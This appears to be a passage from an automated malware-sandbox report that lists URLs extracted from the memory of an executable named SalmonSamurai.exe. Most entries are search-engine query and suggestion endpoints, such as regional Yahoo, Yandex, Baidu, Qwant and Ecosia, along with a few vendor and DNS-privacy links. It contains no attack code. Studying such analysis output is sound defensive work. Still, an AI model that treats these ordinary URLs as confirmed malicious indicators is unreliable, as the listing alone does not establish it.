Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.fr/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.net/s?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggests.go.mail.ru/chrome?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/favicon.icohttps://th.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/favicon.icohttps://tr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/favicon.icohttps://tw.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/favicon.icohttps://ve.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/favicon.icohttps://vn.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://vn.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.amd.com/en/support/apu/amd-series-processors/amd-a8-series-apu-for-laptops/a8-5550m-rade
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ask.com/web?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.baidu.com/#ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.baidu.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.baidu.com/favicon.icohttps://www.baidu.com/#ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.delfi.lt/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.delfi.lt/favicon.icohttps://www.delfi.lt/paieska/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.delfi.lt/paieska/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecosia.org/newtab/(
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.givero.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.givero.com/favicon.icohttps://www.givero.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.givero.com/search?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.givero.com/suggest?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.info.com/serp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.info.com/static/www.info.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.info.com/static/www.info.com/favicon.icohttps://www.info.com/serp?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.intel.com/content/www/us/en/download-center/home.html
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.nic.cz/odvr/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.privacywall.org/images/favicon_32x32.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.privacywall.org/images/favicon_32x32.icohttps://www.privacywall.org/search/secure/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.privacywall.org/search/secure/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/Quad9
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.qwant.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.qwant.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.qwant.com/favicon.icohttps://www.qwant.com/?q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.so.com/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.so.com/favicon.icohttps://www.so.com/s?ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.so.com/s?ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.sogou.com/images/logo/old/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.sogou.com/images/logo/old/favicon.icohttps://www.sogou.com/web?ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.sogou.com/web?ie=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.by/chrome/newtab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.com.tr/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.com.tr/chrome/newtab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.kz/chrome/newtab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.yandex.ua/chrome/newtab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.by/
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.by/images/search/?rpt=imageview
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.by/images/search/?rpt=imageviewhttps://www.yandex.by/chrome/newtabhttps://storage.ape
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageview
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageviewhttps://www.yandex.com.tr/chrome/newtab
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.com/images/search?rpt=imageview
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://yandex.com/search/?text=
